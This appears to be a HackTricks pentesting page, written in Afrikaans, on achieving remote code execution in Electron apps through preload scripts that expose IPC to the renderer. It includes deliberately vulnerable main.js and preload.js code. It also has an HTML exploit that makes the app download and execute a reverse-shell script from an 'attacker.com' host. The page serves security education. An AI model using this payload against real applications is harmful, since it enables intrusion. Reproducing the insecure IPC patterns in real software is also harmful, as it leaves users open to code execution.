# Electron contextIsolation RCE via IPC

{{#include ../../../banners/hacktricks-training.md}}

As die preload-skrip 'n IPC-eindpunt van die main.js-lêer blootstel, sal die renderer-proses toegang daartoe hê en, indien kwesbaar, kan 'n RCE moontlik wees.

**Die meeste van hierdie voorbeelde is hier geneem** [**https://www.youtube.com/watch?v=xILfQGkLXQo**](https://www.youtube.com/watch?v=xILfQGkLXQo). Kyk na die video vir verdere inligting.

## Voorbeeld 0

Voorbeeld van [https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21](https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21) (jy het die volle voorbeeld van hoe MS Teams XSS tot RCE misbruik het in daardie skyfies, dit is net 'n baie basiese voorbeeld):

<figure><img src="../../../images/image (9) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

## Voorbeeld 1

Kyk hoe die `main.js` luister op `getUpdate` en sal **enige URL** wat gegee word **aflaai en uitvoer**.\
Kyk ook hoe `preload.js` **enige IPC** gebeurtenis van die hoof blootstel.
```javascript
// Part of code of main.js
ipcMain.on("getUpdate", (event, url) => {
console.log("getUpdate: " + url)
mainWindow.webContents.downloadURL(url)
mainWindow.download_url = url
})

mainWindow.webContents.session.on(
"will-download",
(event, item, webContents) => {
console.log("downloads path=" + app.getPath("downloads"))
console.log("mainWindow.download_url=" + mainWindow.download_url)
url_parts = mainWindow.download_url.split("/")
filename = url_parts[url_parts.length - 1]
mainWindow.downloadPath = app.getPath("downloads") + "/" + filename
console.log("downloadPath=" + mainWindow.downloadPath)
// Set the save path, making Electron not to prompt a save dialog.
item.setSavePath(mainWindow.downloadPath)

item.on("updated", (event, state) => {
if (state === "interrupted") {
console.log("Download is interrupted but can be resumed")
} else if (state === "progressing") {
if (item.isPaused()) console.log("Download is paused")
else console.log(`Received bytes: ${item.getReceivedBytes()}`)
}
})

item.once("done", (event, state) => {
if (state === "completed") {
console.log("Download successful, running update")
fs.chmodSync(mainWindow.downloadPath, 0755)
var child = require("child_process").execFile
child(mainWindow.downloadPath, function (err, data) {
if (err) {
console.error(err)
return
}
console.log(data.toString())
})
} else console.log(`Download failed: ${state}`)
})
}
)
```

```javascript
// Part of code of preload.js
window.electronSend = (event, data) => {
ipcRenderer.send(event, data)
}
```
Eksploiteer:
```html
<script>
electronSend("getUpdate", "https://attacker.com/path/to/revshell.sh")
</script>
```
## Voorbeeld 2

As die preload-skrip direk aan die renderer 'n manier bied om `shell.openExternal` aan te roep, is dit moontlik om RCE te verkry.
```javascript
// Part of preload.js code
window.electronOpenInBrowser = (url) => {
shell.openExternal(url)
}
```
## Voorbeeld 3

As die preload-skrip maniere blootstel om heeltemal met die hoofproses te kommunikeer, sal 'n XSS in staat wees om enige gebeurtenis te stuur. Die impak hiervan hang af van wat die hoofproses blootstel in terme van IPC.
```javascript
window.electronListen = (event, cb) => {
ipcRenderer.on(event, cb)
}

window.electronSend = (event, data) => {
ipcRenderer.send(event, data)
}
```
{{#include ../../../banners/hacktricks-training.md}}